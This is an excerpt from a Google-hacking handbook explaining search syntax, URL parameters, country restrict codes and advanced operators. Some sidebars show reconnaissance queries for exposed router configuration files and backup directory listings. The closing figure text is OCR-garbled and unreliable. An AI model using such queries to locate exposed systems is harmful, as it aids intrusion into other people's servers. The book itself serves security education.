To get an idea of how Google's Web pages would be altered by a change in the interface language, take a look at Figure 1.7 to see Google's main page rendered in "hacker speak." In addition to changing this setting on the preferences screen, you can access all the language-specific Google interfaces directly from the Language Tools screen at www.google.com/language_tools.
Figure 1.7 The Main Google Page Rendered in "Hacker Speak"

[…]

[Figure: Web search results for the quoted query "! Interface's description."]

First, notice that none of the result summaries look anything like our zebra.conf file. Google effectively ignored our punctuation marks and spacing, despite the fact that we enclosed them in double quotes. Google has instead keyed on the words Interface's and description. In addition, Google's auto stemming feature located the word interface in our fourth returned result. Sometimes auto stemming just plain gets in the way.

Underground Googling
Bad Form on Purpose

In some cases, there's nothing wrong with using poor Google syntax in a search. If Google safely ignores part of a human-friendly query, leave it alone. The human readers will thank you!

I recommend leaving the syntax as is for clarity, but adding another reduction element to our search, zebra.conf, making our next query:

    "! Interface's description." zebra.conf

This narrows our search and returns results that look much more like the conf file we're looking for, as shown in Figure 1.16.

Figure 1.16 Search Reduction in Action

It's tempting in this situation to simply add:

    -"zebra.conf.sample"

to our query to get rid of any result that shows sample zebra.conf files. However, it helps to step into the shoes of the software's users for just a moment. Software installations like this one often ship with a sample configuration file to help guide the process of setting up a custom configuration. Most users will simply edit this file, changing only the settings that need to be changed for their environments, saving the file not as a .sample file but as a .conf file.
In this situation, the user could have a live configuration file with the term zebra.conf.sample still in place. Reduction based on this term may remove live configuration files created in this manner.

There's another reduction angle. Notice that our zebra.conf.sample file contained the term hostname Router. This is most likely one of the settings that a user will change, although we're making an assumption that his machine is not named Router. This is less of a gamble than reducing based on zebra.conf.sample, however. Adding the reduction term -"hostname Router" to our query brings our results number down and reduces our hits on potential sample files, all without sacrificing potential live hits.

Although it's certainly possible to keep reducing, it's often better to make just a few minor reductions that can be validated by eye than to spend too much time coming up with the perfect search reduction. Our final (that's four qualifiers for just one word!) query becomes:

    "! Interface's description." zebra.conf -"hostname Router"

This is not the best query for locating these files, however. Advanced operators, discussed in the next chapter, will get us even closer to that perfect query!

Working With Google URLs

Advanced Google users begin testing advanced queries right from the Web interface's search field, refining queries until they are just right. Every Google query can be represented with a URL that points to the results page. Google's results pages are not static pages. They are dynamic and are created "on the fly" when you click the Search button or activate a URL that links to a results page. Submitting a search through the Web interface takes you to a results page that can be represented by a single URL. For example, consider the query ihackstuff. Once you enter this query, you are whisked away to the following URL, or something similar:

    www.google.com/search?q=ihackstuff

If you bookmark this URL and return to it later or simply enter the URL into your browser's address bar, Google will reprocess your search for ihackstuff and display the results. This URL is then not only an active connection to a list of results but also a nice, compact sort of shorthand for a Google query. Any experienced Google searcher can take a look at this URL and recognize the search subject. This URL can also be modified fairly easily. By changing the word ihackstuff to iwritestuff, the Google query is changed to find the term iwritestuff. This simple example illustrates the usefulness of the Google URL for advanced searching. A quick modification of the URL can make changes happen fast!

Underground Googling
Uncomplicating URL Construction

The only URL parameter that is required in most cases is a query (the q parameter), […]
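The URL shorthand described in this section can be sketched in a few lines of Python. This is only an illustration under stated assumptions, not anything provided by Google or taken from this book: the helper names google_url and query_of are made up for the example, the www.google.com/search address and the q parameter come from the text above, and hl=en is an assumed example of an optional extra parameter.

```python
from urllib.parse import parse_qs, urlencode, urlsplit

# Results-page address used in this chapter's examples.
BASE = "http://www.google.com/search"


def google_url(query, **extra):
    """Build a results-page URL; q is the only parameter we always set."""
    params = {"q": query}
    params.update(extra)  # optional parameters, e.g. hl="en" (assumed example)
    return BASE + "?" + urlencode(params)


def query_of(url):
    """Recover the search terms (the q parameter) from a results-page URL."""
    return parse_qs(urlsplit(url).query)["q"][0]


print(google_url("ihackstuff"))
print(google_url("ihackstuff", hl="en"))

# Quotes, spaces, and punctuation are escaped for us and survive a round trip.
reduced = '"! Interface\'s description." zebra.conf -"hostname Router"'
print(query_of(google_url(reduced)) == reduced)
```

Changing the search term is then a matter of calling google_url("iwritestuff"), which mirrors editing the word after q= by hand in the browser's address bar.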
[Figure: Google results page for the search term food]

Our URL has changed to include the restrict value (select countries shown in Table 1.7), but more important, notice that the returned Web pages are not all from DK. The first hit, for example, from www.euro.who.int, is thought by Google to be physically located in Denmark.

Underground Googling
How Google Owns the Continents

You can easily test Google's assumption that a site is within a certain geographic region with a quick host and whois command:

    wh00p:~# host www.euro.who.int
    www.euro.who.int has address 194.234.173.80
    wh00p:~# whois 194.234.173.80
    % This is the RIPE Whois server.
    % The objects are in RPSL format.
    % Rights restricted by copyright.
    % See http://www.ripe.net/ripencc/pub-services/db/copyright.html
    inetnum: 194.234.173.0 - 194.234.173.255
    netname: DK-SUPERTEL
    descr: SUPERTEL DANMARK ApS
    descr: Telephone Operator
    country: DK

Table 1.7 restrict Code Values (see full table in Appendix C)

restrict country code | Country
countryAF | Afghanistan
countryAR | Argentina
countryAU | Australia
countryBE | Belgium
countryBM | Bermuda
countryBR | Brazil
countryBS | Bahamas
countryCA | Canada
countryCH | Switzerland
countryCN | China
countryCO | Colombia
countryCR | Costa Rica
countryCU | Cuba
countryCZ | Czech Republic
countryDE | Germany
[…]
countryDO | Dominican Republic
countryEG | Egypt
countryES | Spain
[…]
countryGR | Greece
countryGU | Guam
countryHK | Hong Kong
countryHT | Haiti
countryIE | Ireland
countryIL | Israel
countryIN | India
countryIQ | Iraq
countryIR | Iran (Islamic Republic of)
countryIS | Iceland
countryIT | Italy
countryJM | Jamaica
countryJP | Japan
countryKE | Kenya
countryKP | Korea, Democratic People's Republic of
countryKR | Korea, Republic of
countryKW | Kuwait
countryKY | Cayman Islands
countryLK | Sri Lanka
countryMX | Mexico
countryNL | Netherlands
countryNO | Norway
countryNZ | New Zealand
countryPA | Panama
countryPE | Peru
countryPH | Philippines
countryPK | Pakistan
countryPL | Poland
countryPR | Puerto Rico
countryPT | Portugal
countryRO | Romania
countryRU | Russian Federation
countrySA | Saudi Arabia
countrySE | Sweden
countryUA | Ukraine
countryUG | Uganda
countryUM | United States Minor Outlying Islands
countryUS | United States
countryUY | Uruguay
countryUZ | Uzbekistan
countryVA | Holy See (Vatican City State)
countryVG | Virgin Islands (British)
countryVI | Virgin Islands (U.S.)
countryVN | Vietnam
countryZA | South Africa
countryZR | Zaire

Summary

Google is deceptively simple in appearance but offers many powerful options that provide the groundwork for powerful searches. Many different types of content can be searched, including Web pages, message groups such as USENET, images, and more. Beginners to Google searching are encouraged to use the Google-provided forms for searching, paying close attention to the messages and warnings Google provides about syntax.
Boolean operators such as NOT and OR are available through the use of the minus sign and the word OR (or the | symbol), respectively, whereas the AND operator is ignored, since Google automatically includes all terms in a search. Advanced search options are available through the Advanced Search page, which allows users to narrow search results quickly. Advanced Google users narrow their searches through customized queries and a healthy dose of experience and good old common sense.

Solutions Fast Track

Exploring Google's Web-Based Interface

☑ There are several distinct Google search areas (including Web, group, and image searches), each with distinct searching characteristics and results pages.
☑ The Web search page, the heart and soul of Google, is simple, streamlined, and powerful, enabling even the most advanced searches.
☑ A Google Groups search allows you to search all past and present newsgroup posts.
☑ The Image search feature allows you to search for nearly a billion graphics by keyword.
☑ Google's preferences and language tools enable search customization, translation services, language-specific searches, and much more.

Building Google Queries

☑ Google query building is a process that includes determining a solid base search and expanding or reducing that search to achieve the desired results.
☑ Always remember the "golden rules" of Google searching. These basic premises serve as the foundation for a successful search.
☑ Used properly, Boolean operators and special characters help expand or reduce searches. They can also help clarify a search for fellow humans who might read your queries later on.

Working With Google URLs

☑ Once a Google query has been submitted, you are whisked away to the Google results page, the URL of which can be used to modify a search or recall it later.
☑ Although there are many different variables that can be set in a Google search URL, the only one that is really required is the q, or query, variable.
☑ Some advanced search options, such as as_qdr (date-restricted search by month), cannot be easily set anywhere besides the URL.

Links to Sites

■ www.google.com This is the main Google Web page, the entry point for most searches.
■ http://groups.google.com The Google Groups Web page.
■ www.google.com/images Search Google for images and graphics.
■ www.google.com/language_tools Various language and translation options.
■ www.google.com/advanced_search The advanced search form.
■ www.google.com/preferences The Preferences page, which allows you to set options such as interface language, search language, SafeSearch filtering, and number of results per page.
■ www.google.com/intl/xx-hacker/ A hacker's search page.

Frequently Asked Questions

The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com.

Q: Some people like using nifty toolbars. Where can I find information about Google toolbars?

A: Ask Google. Seriously, if you aren't already in the habit of simply asking Google when you have a Google-related question, you should get in that habit. Google can almost always provide an answer if you can figure out the query. Here's a list of some popular Google search tools:

■ Windows Google API Search Tool, www.searchenginelab.com/products/gapis/
■ Mac SearchGoogle.service, http://gu.st/proj/SearchGoogle.service/
■ Mozilla Googlebar, http://googlebar.mozdev.org/
■ Internet Explorer The Google Toolbar, toolbar.google.com/
■ Dave's Quick Search Taskbar Tool, http://notesbydave.com/toolbar/
■ Ultrabar www.ultrabar.com/

Q: Are there any techniques I can use to learn how to build Google URLs?

A: Yes. There are a few ways. First, submit basic queries through the Web interface and look at the URL that's generated when you submit the search. From the search results page, modify the query slightly and look at how the URL changes when you submit it. This boils down to "do, then do again." The second way involves using "query builder" programs that present a graphical interface that allows you to select the search options you want, building a Google URL as you navigate through the interface. Keep an eye on the search engine hacking forums at http://johnny.ihackstuff.com, specifically the "coders corner" where users discuss programs that perform this type of functionality.

Q: What's better? Using Google's interface, using toolbars, or writing URLs?

A: It's not fair to claim that any one technique is better than the others. It boils down to personal preference, and many advanced Google users use each of these techniques in different ways. Many lengthy Google sessions begin as a simple query typed into the www.google.com Web interface. Depending on the narrowing process, it may be easier to add or subtract from the query right in the search field. Other times, as in the case of the daterange operator (covered in the next chapter), it may be easier to add a quick as_qdr parameter to the end of the URL. Toolbars excel at providing you quick access to a Google search while you're browsing another page. Most toolbars allow you to select text on a page, right-click on the page and select 'Google search' to submit the selected text as a query to Google.
Which technique you decide to use ultimately depends on your tastes and the context in which you perform searches.

Solutions in this Chapter:
■ Operator Syntax
■ Introducing Google's Advanced Operators
■ Combining Advanced Operators
■ Colliding Operators and Bad Search-Fu
■ Links to Sites
■ Summary
■ Solutions Fast Track
■ Frequently Asked Questions

Chapter 2 • Advanced Operators

Introduction
Beyond the basic searching techniques explored in the previous chapter, Google offers special terms known as advanced operators to help you perform more advanced queries. These operators, when used properly, can help you get to exactly the information you're looking for without spending too much time poring over page after page of search results. When advanced operators are not provided in a query, Google will locate your search terms in any area of the Web page, including the title, the text, the URL, or the like. We take a look at the following advanced operators in this chapter:
■ intitle, allintitle
■ inurl, allinurl
■ filetype
■ allintext
■ site
■ link
■ inanchor
■ daterange
■ cache
■ info
■ related
■ phonebook
■ rphonebook
■ bphonebook
■ author
■ group
■ msgid
■ insubject
■ stocks
■ define

Operator Syntax
An advanced operator is nothing more than a part of a query. You provide advanced operators to Google just as you would any other query. In contrast to the somewhat free-form style of standard Google queries, however, advanced operators have a fairly rigid syntax that must be followed. The basic syntax of a Google advanced operator is operator:search_term. When using advanced operators, keep in mind the following:
■ There is no space between the operator, the colon, and the search term. Violating this syntax can produce undesired results and will keep Google from understanding the advanced operator. In most cases, Google will treat a syntactically bad advanced operator as just another search term.
For example, providing the advanced operator intitle without a following colon and search term will cause Google to return pages that contain the word intitle.
■ The search term is the same syntax as search terms we covered in the previous chapter. For example, you can provide as a search term a single word or a phrase surrounded by quotes. If you provide a phrase as the search term, make sure there are no spaces between the operator, the colon, and the first quote of the phrase.
■ Boolean operators and special characters (such as OR and +) can still be applied to advanced operator queries, but be sure not to place them in the way of the separating colon.
■ Advanced operators can be combined in a single query as long as you honor both the basic Google query syntax as well as the advanced operator syntax. Some advanced operators combine better than others, and some simply cannot be combined. We will take a look at these limitations later in this chapter.
■ The ALL operators (the operators beginning with the word ALL) are oddballs. They are generally used once per query and cannot be mixed with other operators.

Examples of valid queries that use advanced operators include these:
■ intitle:Google This query will return pages that have the word Google in their title.
■ intitle:"index of" This query will return pages that have the phrase index of in their title. Remember from the previous chapter that this query could also be given as intitle:index.of, since the period serves as any character. This technique also makes it easy to supply a phrase without having to type the spaces and the quotation marks around the phrase.
■ intitle:"index of" private This query will return pages that have the phrase index of in their title and also have the word private anywhere in the page, including in the URL, the title, the text, and so on.
Notice that intitle only applies to the phrase index of and not the word private, since the first unquoted space follows the index of phrase. Google interprets that space as the end of your advanced operator search term and continues processing the rest of the query.
■ intitle:"index of" "backup files" This query will return pages that have the phrase index of in their title and the phrase backup files anywhere in the page, including the URL, the title, the text, and so on. Again, notice that intitle only applies to the phrase index of.

Troubleshooting Your Syntax
Before we jump head first into the advanced operators, let's talk about troubleshooting the inevitable syntax errors you'll run into when using these operators. Google is kind enough to tell you when you've made a mistake, as shown in Figure 2.1.

Figure 2.1 Google's Helpful Error Messages
[Figure: a search for google submitted with as_qdr=3m in the URL. Google reports: "The date restriction was dropped from your search because it is not supported for this type of search."]

In this example, we tried to give Google an invalid option to the as_qdr variable in the URL. (The correct syntax would be as_qdr=m3, as we'll see in a moment.) Google's search result page listed right at the top that there was some sort of problem. These messages are often the key to unraveling errors in either your query string or your URL, so keep an eye on the top of the results page. We've found that it's easy to overlook this spot on the results page, since we normally scroll past it to get down to the results.

Sometimes, however, Google is less helpful, returning a blank results page with no error text, as shown in Figure 2.2.
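The syntax rules and the as_qdr example discussed above can be sketched in a few lines of Python. This is only an illustration under stated assumptions: the helper names operator_term and search_url are hypothetical, and the check that as_qdr looks like the letter m followed by a number is drawn from the m3 form mentioned in the text, not from a complete list of what Google accepts.

```python
import re
from urllib.parse import urlencode


def operator_term(operator, term):
    """Join an operator and its search term with no spaces around the colon.

    A multi-word term is wrapped in quotes so the whole phrase stays
    attached to the operator (hypothetical helper, for illustration only).
    """
    if " " in term:
        term = '"' + term + '"'
    return operator + ":" + term


def search_url(query, as_qdr=None):
    """Build a search URL; q is the only variable that is really required."""
    params = {"q": query}
    if as_qdr is not None:
        # Assumption: only the month form from the text (m3, m6, ...) is checked.
        if not re.fullmatch(r"m\d+", as_qdr):
            raise ValueError("expected a value such as m3, got " + repr(as_qdr))
        params["as_qdr"] = as_qdr
    return "http://www.google.com/search?" + urlencode(params)


# intitle applies only to the quoted phrase; private is an ordinary term.
print(operator_term("intitle", "index of") + " private")
print(search_url("google", as_qdr="m3"))
```

Passing the reversed form 3m to search_url raises a ValueError in this sketch, which mirrors the mistake behind the error message in Figure 2.1.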
Figure 2.2 Google's Blank Error Message
[Figure: the query filetype:pdf returns a blank results page.]

Fortunately, this type of problem is easy to resolve once you understand what's going on. In this case, we didn't provide Google with a search query. We restricted our search to only PDF files (we'll look at filetype in more detail later in this chapter), but we failed to provide anything to search for. Subtracting results from zero results gets Google all confused, resulting in a blank page.

But That's What I Wanted!
Sometimes you actually want to get results for a search query you know is going to cause problems, such as filetype:pdf. It seems reasonable that this query would return every PDF file that Google has crawled, but it simply doesn't. In cases like this, you just need to be a bit creative. To get a list of every PDF file, try a query like filetype:pdf pdf. This query asks Google to return every PDF file that contains the word pdf. Remember, though, that Google automatically searches the URL for your search term, so every file ending in .PDF will have PDF in the URL.

Google's advanced operators are very versatile, but keep in mind the rules listed earlier. In addition, you should remember that not all operators can be used everywhere. Some operators can only be used in performing a Web search, and others can only be used in a Groups search. Refer to Table 2.3, which lists these distinctions. If you have trouble remembering these rules, keep an eye on the results line near the top of the page. If Google picks up on your bad syntax, an error message will be displayed, letting you know what you did wrong.
Sometimes, however, Google will not pick up on your bad form and will try to perform the search anyway. If this happens, keep an eye on the search results page, specifically the words Google shows in bold within the search results. These are the words Google interpreted as your search terms. If you see the word intitle in bold, for example, you've probably made a mistake using the intitle operator.

Introducing Google's Advanced Operators

Intitle and Allintitle: Search Within the Title of a Page
From a technical standpoint, the title of a page can be described as the text that is found within the TITLE tags of an HTML document. The title is displayed at the top of most browsers when viewing a page, as shown in Figure 2.3. In the context of Google groups, intitle will find the term in the title of the message post.

Figure 2.3 Web Page Title
[Figure: the Syngress home page, with "Syngress Publishing" in the browser title bar.]

As shown in Figure 2.3, the title of the Web page is "Syngress Publishing." It is important to realize that some Web browsers will insert text into the title of a Web page, under certain circumstances. For example, consider the page shown in Figure 2.3, shown again in Figure 2.4, this time before the page is actually finished loading.

Figure 2.4 Browser Injected Title Elements
[Figure: the same page while loading; the browser title bar reads Loading "Syngress Publishing".]
[Figure: Google results for intitle:"index of" "backup files", about 556 results; the first result is titled "Index of /tex-archive/support/lintex".]

Notice that "backup files" is not in the title of the first found document. If we were to modify this query to allintitle:"index of" "backup files" we would get a different response from Google, as shown in Figure 2.6.

Figure 2.6 Allintitle Results Compared

any type of page with any kind of extension, but understand that Google might not have the capability to search an unknown file type.

Table 2.1 listed the main file types that Google searches, but you might be wondering which, of the over 8,000 file extensions, are the most prevalent on the Web. Table 2.2 lists the top 25 file extensions found on the Web, sorted by the number of hits for that file type.

Table 2.2 Top 25 File Extensions, According to Google

Extension   Number of Hits (Approx.)
HTML        18,100,000
HTM         16,700,000
PHP         16,600,000
ASP         15,700,000
CGI         11,600,000
PDF         10,900,000
CFM         9,880,000
SHTML       8,690,000
JSP         7,350,000
ASPX        6,020,000
PL          5,890,000
PHP3        4,420,000
DLL         3,050,000
PHTML       2,770,000
FCGI        2,550,000
SWF         2,290,000
DOC         2,100,000
TXT         1,720,000
PHP4        1,460,000
EXE         1,410,000
MV          1,110,000
XLS         969,000
JHTML       968,000
SHTM        883,000
BML         859,000

Many of the file extensions shown in Table 2.2 might be familiar to you; others might not.
Filext (www.filext.com) is a great resource for getting detailed information about file extensions, what they are, and what programs the extensions are associated with.

Google converts every document it searches to either HTML or text for online viewing. You can see that Google has searched and converted a file by looking at the results page shown in Figure 2.11.

Figure 2.11 Converted File Types on a Search Page
[Figure: results for filetype:doc doc; the first result, "The Darknet and the Future of Content Distribution," is marked [DOC], with the file format Microsoft Word 2000 and a View as HTML link.]

Notice that the first result lists [DOC] before the title of the document and a file format of Microsoft Word 2000. This indicates that Google recognized the file as a Microsoft Word 2000 document. In addition, Google has provided a View as HTML link that when clicked will display an HTML approximation of the file, as shown in Figure 2.12.

Figure 2.12 A Google-Converted Word Document
[Figure: Google's HTML version of the Word document, with a header that links to the original file.]

When you click the link for a document that Google has converted, a header is displayed at the top of the page, indicating that you are viewing the HTML version of the page. A link to the original file is also provided. If you think this looks similar to the cached view of a page, you're right. This is the cached version of the original page, converted to HTML.

Although these are great features, Google isn't perfect. Keep these things in mind:
■ Google doesn't always provide a link to the converted version of a page.
■ Google doesn't always properly recognize the file type of even the most common file formats.
■ When Google crawls a page that ends in a particular file extension but that file is blank, Google will sometimes provide a valid file type and a link to the converted page. Even the HTML version of a blank Word document is still, well, blank.

This operator flakes out when ORed. As an example, the query filetype:xls xls returns 912,000 results. The query filetype:pdf pdf returns 10,900,000 results. The query (filetype:pdf | filetype:xls) returns 17,600,000 results, which is pretty close to the two individual search results combined. However, when you start adding to this precocious combination with things like (filetype:pdf | filetype:xls) (pdf | xls), Google flakes out with only 10,700,000 results. To make matters worse, all the returned files are PDF, and none are XLS files. We've found that Boolean logic applied to this operator is usually flaky, so beware when you start tinkering.

This operator can be mixed with other operators and search terms.
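The filetype query shapes described in this section can be sketched as small string builders. This is a minimal illustration, not a tool from the book: the function names filetype_with_keyword and filetype_any are hypothetical, and the code only assembles query text. It does not contact Google or predict result counts.

```python
def filetype_with_keyword(extension):
    """Pair filetype with the extension as a search term, as in filetype:pdf pdf.

    filetype on its own returns a blank page, so the extension is repeated
    as an ordinary term that will match the file's URL.
    """
    ext = extension.lower().lstrip(".")
    return "filetype:{0} {0}".format(ext)


def filetype_any(extensions):
    """OR several filetype terms together, as in (filetype:pdf | filetype:xls)."""
    terms = ["filetype:" + ext.lower().lstrip(".") for ext in extensions]
    if not terms:
        raise ValueError("at least one extension is required")
    if len(terms) == 1:
        return terms[0]
    return "(" + " | ".join(terms) + ")"


print(filetype_with_keyword("PDF"))
print(filetype_any(["pdf", "xls"]))
```

Because the text reports that Boolean logic on filetype is flaky, a cautious approach might be to run one filetype_with_keyword query per extension and compare the results, rather than trusting a single ORed query.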
Underground Googling
Google Hacking Tip
We simply can't state this enough: The real hackers play in the gray areas all the time. The filetype operator opens up another interesting playground for the true Google hacker. Consider the query (filetype:pdf | filetype:xls) -inurl:xls -inurl:pdf, a query that should return zero results, since all PDF and XLS files have PDF or XLS in the URL, right? Wrong. At the time of this writing, this query gives over 100 results, all of them interesting, to say the least. Pay close attention to the next character %00.

Link: Search for Links to a Page
The link operator allows you to search for pages that link to other pages. Instead of providing a search term, the link operator requires a URL or server name as an argument. Shown in its most basic form, link is used with a server name, as shown in Figure 2.13.

Figure 2.13 The Link Operator
[Figure: results for link:www.defcon.org, listing pages that link to www.defcon.org.]

Each of the search results shown in Figure 2.13 contains HTML links to the www.defcon.org Web site. The link operator can be extended to include not only basic URLs but complete URLs that include directory names, filenames, parameters, and the like.
Keep in mind that long URLs are much more specific and could return fewer results.

The only place the URL of a link is visible is in the browser's status bar or in the source of the page. For that reason, unlike other cached pages, the cached page for a link operator's search result does not highlight the search term, since the search term (the linked Web site) is never really shown in the page. In fact, the cached banner does not make any reference to your search query, as shown in Figure 2.14.

Figure 2.14 A Generic Cache Banner Displayed for a Link Search
[Figure: Google's cache banner for a page found by a link search; the banner does not mention the search query.]

The inanchor operator helps search the anchor, or the displayed text on the link, the words "current page." Inanchor accepts a word or phrase as an argument, such as inanchor:click or inanchor:James.Foster. This search will be handy later, especially when we begin to explore ways of searching for relationships between sites. The inanchor operator can be used with other operators and search terms.

Cache: Show the Cached Version of a Page
As we've already discussed, Google keeps snapshots of pages it has crawled that we can access via the cached link on the search results page. If you would like to jump right to the cached version of a page without first performing a Google query to
get to the cached link on the results page, you can simply use the cache advanced operator in a Google query such as cache:blackhat.org or cache:http://www.netsec.net. If you don't supply a complete URL or hostname, Google could return unpredictable results. Just as with the link operator, passing an invalid hostname or URL as a parameter to cache will submit the query as a phrase search. A search for cache:linux returns exactly as many results as "cache linux", indicating that Google did indeed treat the cache search as a standard phrase search.

The cache operator does not always work as expected, and in many cases, you're better off getting to a cached page from a Google results page. The cache operator cannot be used with other operators or search terms.

Numrange: Search for a Number
The numrange operator requires two parameters, a low number and a high number, separated by a dash. This operator is powerful but dangerous when used by malicious Google hackers. As the name suggests, numrange can be used to find numbers within a range. For example, to locate the number 12345, a query such as numrange:12344-12346 will work just fine. When searching for numbers, Google ignores symbols such as currency markers and commas, making it much easier to search for numbers on a page.

Two shortened versions of this operator exist as well. Instead of supplying the numrange operator, you can simply provide two numbers in a query, separated by two periods. The shortened version of the query just mentioned would be 12344..12346. Notice that the numrange operator was left out of the query entirely. In addition, the ext operator can be used as in ext:12344-12346. Each of these shorthand versions returns the same results as the matching numrange search.

This operator can be used with other operators and search terms.

Underground Googling
Bad Google Hacker!
If Gandalf the Grey were to author this sidebar, he wouldn't be able to resist saying something like "There are fouler things than characters lurking in the dark places of Google's cache." The most grave examples of Google's power lie in the use of the numrange operator. It would be extremely irresponsible of us to share these powerful queries with you. Fortunately, the abuse of this operator has been curbed due to the diligence of the hard-working members of the Search Engine Hacking forums at http://johnny.ihackstuff.com. The members of that community have taken the high road time and time again to get the word out about the dangers of Google hackers without spilling the beans and creating even

Daterange: Search for Pages Published Within a Certain Date Range
The daterange operator can tend to be a bit clumsy, but it is certainly helpful and worth the effort to understand. You can use this operator to locate pages indexed by Google within a certain date range. Every time Google crawls a page, this date changes. If Google locates some very obscure Web page, it might only crawl it once, never returning to index it again. If you find that your searches are clogged with these types of obscure Web pages, you can remove them from your search (and subsequently get fresher results) through effective use of the daterange operator.

The parameters to this operator must always be expressed as a range, two dates separated by a dash. If you only want to locate pages that were indexed on one specific date, you must provide the same date twice, separated by a dash. If this sounds too easy to be true, you're right. It is too easy to be true. Both dates passed to this operator must be in the form of two Julian dates. The Julian date is the number of days that have passed since January 1, 4713 B.C. For example, the date September 11, 2001, is represented in Julian terms as 2452164.
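The Julian date conversion described above can be sketched with Python's standard library. This is a hedged illustration: the helper names julian_day and daterange_term are hypothetical, and the constant 1721425 is the usual offset between Python's proleptic Gregorian ordinal (date.toordinal()) and the Julian day number.

```python
from datetime import date

# date.toordinal() counts days from 0001-01-01 (which is day 1); adding
# this offset gives the Julian day number for the same calendar date.
JDN_OFFSET = 1721425


def julian_day(day):
    """Return the Julian day number for a datetime.date."""
    return day.toordinal() + JDN_OFFSET


def daterange_term(start, end=None):
    """Build a daterange term; a single date is given twice, as the text requires."""
    if end is None:
        end = start
    return "daterange:{}-{}".format(julian_day(start), julian_day(end))


print(julian_day(date(2001, 9, 11)))      # 2452164
print(daterange_term(date(2001, 9, 11)))  # daterange:2452164-2452164
```

The first printed value matches the figure given in the text for September 11, 2001.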
So, to search for pages that were indexed by Google on September 11, 2001, and contained the phrase "osama bin laden," the query would be daterange:2452164-2452164 "osama bin laden".

Google does not officially support the daterange operator. The Google folks prefer you use the date limit on the advanced search form found at http://www.google.com/advanced_search. As we discussed in the last chapter, this form creates fields in the URL string to perform specific functions. Google designed the as_qdr field to help you locate pages that have been updated within a certain time frame. For example, to find pages that have been updated within the past three months and that contain the word Google, use the query http://www.google.com/search?q=google&as_qdr=m3.

This might be a better alternative date restrictor than the clumsy daterange operator. Just understand that these are very different functions. Daterange is not the advanced-operator equivalent for as_qdr, and unfortunately, there is no operator equivalent. If you want to find pages that have been updated within the past year or less, you must either use Google's advanced search interface or stick &as_qdr=m3 (or equivalent) on the end of your URL.

The daterange operator must be used with other search terms or advanced operators. It will not return any results when used by itself. In addition, daterange only works with Web searches.

Info: Show Google's Summary Information
The info operator shows the summary information for a site and provides links to other Google searches that might pertain to that site, as shown in Figure 2.18. The parameter to this operator must be a valid URL or site name. You can achieve this same functionality by supplying a site name or URL as a search query.
Figure 2.18 A Google Info Query's Output
[Figure: results for info:www.csc.com, offering links to Google's cache of the site, stock quotes for CSC, pages similar to the site, pages that link to the site, and pages that contain the term "www.csc.com".]

If you don't supply a complete URL or hostname, Google could return unpredictable results. Just as with the link and cache operators, passing an invalid hostname or URL as a parameter to info will submit the query as a phrase search. A search for info:linux returns exactly as many results as "info linux", indicating that Google did indeed treat the info search as a standard phrase search.

The info operator cannot be used with other operators or search terms.

Related: Show Related Sites
The related operator displays sites that Google has determined are related to a site, as shown in Figure 2.19. The parameter to this operator is a valid site name or URL. You can achieve this same functionality by clicking the Similar Pages link from any search results page or by using the "Find pages similar to the page" (shown in Figure 2.19) portion of the advanced search form.

Figure 2.19 Odd Relatives: Sensepost and Disney?
[Figure: results for related:www.sensepost.com, which include Disney Channel and Nickelodeon pages alongside security sites.]

If you don't supply a complete URL or hostname, Google could return unpredictable results. Passing an invalid hostname or URL as a parameter to related will submit the query as a phrase search. A search for related:linux returns exactly as many results as "related linux", indicating that Google did indeed treat the related search as a standard phrase search.

The related operator cannot be used with other operators or search terms.

Author: Search Groups for an Author of a Newsgroup Post
The author operator will allow you to search for the author of a newsgroup post. The parameter to this option consists of a name or an e-mail address. This operator can only be used in conjunction with a Google Groups search. Attempting to use this operator outside a Groups search will result in an error. When you're searching for a simple name, such as author:Johnny, the search results will include posts written by anyone with the first, middle, or last name of Johnny, as shown in Figure 2.20.

Figure 2.20 A Search for Author:Johnny
In our experience, the group operator does not mix very well with other operators. If you get odd results when throwing group into the mix, try using other operators such as intitle to compensate.

Insubject: Search Google Groups Subject Lines
The insubject operator is effectively the same as the intitle search and returns the same results. Searches for intitle:dragon and insubject:dragon return exactly the same number of results. This is most likely because the subject of a group post is also the title of the post. Subject is (and was, in DejaNews) the more precise term for a message title, and this operator most likely exists to help ease the mental shift from "deja searching" to Google searching.

Just like the intitle operator, insubject can be used with other operators and search terms.

Msgid: Locate a Group Post by Message ID
The msgid operator, available only for Groups searching, takes only one parameter, a group message identifier. A message identifier (or message ID) is a unique string that identifies a newsgroup post. The format is something like xxx@YYY.com.

To view message IDs, you must view the original group post format. When viewing a post (see Figure 2.24), simply click the original format link. You will be taken to a text-only page that lists the entire content of the group post, as shown in Figure 2.25.

Figure 2.24 A Typical Group Message
eAladdin.com Certified Ethical Hacker ■ Cartifcaton Training Courea AII-inclusrM« 5-day boot camp ■ WWWJt- centers.com From: Lensman (p re si d e nt@ w h ite h o u se gov ) Subject; Re: google primer Newsgroups: allhacking Date: 2004-05-14 03:55:03 PST Search result 9 For google hacking Search Result 9 View: Complete Thread (12 articles) Original Format On Fri, 14 May 2004 08:05:14 GMT, grey wrote: f ■•'■<-^ WWW. syngress.com Advanced Operators • Chapter 2 71 Figure 2.25 The Message ID of a Post Is Visible Only in the Post's Original Format El http://groups. google. conn/group5?selm...slir7eebo6b?^04 ax. corn&output=gplaii C I |C]littp://groups. google. <:om/groijps7selm=9[89a " Or Google From: Lensman -Jpresident Swhitehouse . gov> ewsgroups : alt . hacking Sub j ect : Re : google primer Date! Fri, 14 May 2004 l0!54!0l +0000 |UTC} Organization '. BT Openworld Lines ! 4^ Hessage-ID ■ <9t89a0d61aaS5Sn jol2&t&&3lir7eebo6b@4ax . coni> References! -JqsefiaOto j oObtvOevi66p Ikf nr Iaijhij34v8 4ax . coiii> ■<:40a32£9d. 0^1 news 1 .mweb .co.2a> <6691a.0'hi2 12mknkck2 n9immj 2 ijgk3qab78 g 4 ax . coni> Heply-To : president gwhitehouse . gov HNTP-Posting-Bost ■ host2 17-45-254-49. in-addr . b t openworld . com Mime- Version s 1.0 Content-Type s text /plain ; charset=us-asGii Content-Transfer-Encoding ■ 7bit X-Trace! herciiles.btinternet.com 10845:12041 11181 217.45.254.49 {lH May 2004 10!54!01 GMT) X-Complaints-To ! news-complaints^ lists . btinternet . com HMTP-Posting-Date ! Fri, 14 May 2004 10; 54; 01 +0000 (UTC) X-Hewsreader ■ Forte Free Agent 2.0/32.652 3 To retrieve the message shown in Figure 2.25, use the query 